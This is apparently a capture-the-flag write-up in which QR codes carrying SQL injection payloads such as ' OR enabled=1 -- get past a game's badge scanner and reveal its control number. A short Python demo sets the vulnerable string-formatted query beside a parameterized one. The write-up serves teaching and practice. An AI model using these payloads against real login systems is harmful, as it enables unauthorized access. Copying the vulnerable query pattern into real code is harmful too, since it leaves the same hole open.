Badge Manipulation

Objective #6
Upper Level

Bypass the authentication mechanism associated with the room near Pepper Minstix. A sample employee badge is available. What is the access control number revealed by the door authentication panel?

For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge.

Pepper Minstix

Barcode Creation hint from Pepper Minstix
Creating QR barcodes


SQL Injection hint from Pepper Minstix
SQL Injection


All of the Kringle Castle employees have these cool cards with QR codes on them that give us access to restricted areas.
Unfortunately, the badge-scan-o-matic said my account was disabled when I tried scanning my badge.
I really needed access so I tried scanning several QR codes I made from my phone but the scanner kept saying "User Not Found".
I researched a SQL database error from scanning a QR code with special characters in it and found it may contain an injection vulnerability.
I was going to try some variations I found on OWASP but decided to stop so I don't tick off Alabaster.

Opening the Scan-O-Matic presents a terminal that allows uploading QR code images.

initial Scan-O-Matic screen

Let's install the qrcode package, which provides the qr command-line tool, to generate QR images.

pip install qrcode pillow

Trying a simple value such as 1234 results in NO AUTHORIZED USER ACCOUNT FOUND!

qr 1234 > qr.png

unauthorized Scan-O-Matic

Trying a single quote, the simplest SQL injection probe, reveals a lot of information:

qr "'" > qr.png
EXCEPTION AT (LINE 96 \"user_info = query(\"SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1\".format(uid))\"): (1064, u\"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 1' at line 1\")

Therefore, it can be assumed that the backend Python code building the SQL query looks like this:

user_info = query("SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1".format(uid))

Trying the standard SQL injection ' OR '1'='1 returns Authorized User Account Has Been Disabled!

qr "' OR '1'='1" > qr.png

That means the first matching row was selected and its enabled column is 0. Let's fix that with a more targeted SQL injection, like ' OR enabled=1 -- .

qr "' OR enabled=1 -- " > qr.png

Success! The terminal returns User Access Granted - Control number 19880715.

authorized Scan-O-Matic

The answer to this objective is 19880715.
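As an added example (not part of the original writeup or of the challenge's own code), the script below reproduces the panel responses seen above against a constructed in-memory SQLite table, running each scanned value through both the string-formatted query reconstructed from the error message and a parameterized version of it. The table rows, the badge uid values and the panel message strings are assumptions made for the demonstration.

```python
import sqlite3

# Constructed in-memory stand-in for the employees table. Column names are
# taken from the query leaked in the Scan-O-Matic error; the rows are made up.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (uid TEXT, first_name TEXT, "
                 "last_name TEXT, enabled INTEGER, authorized INTEGER)")
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?, ?, ?)", [
        ("badge-0001", "Pepper", "Minstix", 0, 1),     # authorized but disabled
        ("badge-0002", "Alabaster", "Snowball", 1, 1),  # authorized and enabled
    ])
    return conn

def query_vulnerable(conn, uid):
    # Same shape as the backend query reconstructed above: the badge contents are
    # formatted straight into the SQL text, so quotes and "--" are parsed as SQL.
    sql = ("SELECT first_name,last_name,enabled FROM employees "
           "WHERE authorized = 1 AND uid = '{}' LIMIT 1".format(uid))
    return conn.execute(sql).fetchone()

def query_safe(conn, uid):
    # Hardened form: uid is bound as a parameter and never becomes SQL text.
    sql = ("SELECT first_name,last_name,enabled FROM employees "
           "WHERE authorized = 1 AND uid = ? LIMIT 1")
    return conn.execute(sql, (uid,)).fetchone()

def scan(uid, safe=False):
    """Return the panel message for a scanned badge value (assumed wording)."""
    conn = build_db()
    try:
        row = (query_safe if safe else query_vulnerable)(conn, uid)
    except sqlite3.Error as exc:  # corresponds to the EXCEPTION AT ... response
        return "EXCEPTION: {}".format(exc)
    if row is None:
        return "NO AUTHORIZED USER ACCOUNT FOUND!"
    if row[2] != 1:
        return "Authorized User Account Has Been Disabled!"
    return "User Access Granted"

if __name__ == "__main__":
    for value in ("1234", "'", "' OR '1'='1", "' OR enabled=1 -- "):
        print(repr(value), "->", scan(value), "| parameterized:", scan(value, safe=True))
```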


Die Hard (1988) ... It was released on July 15, 1988.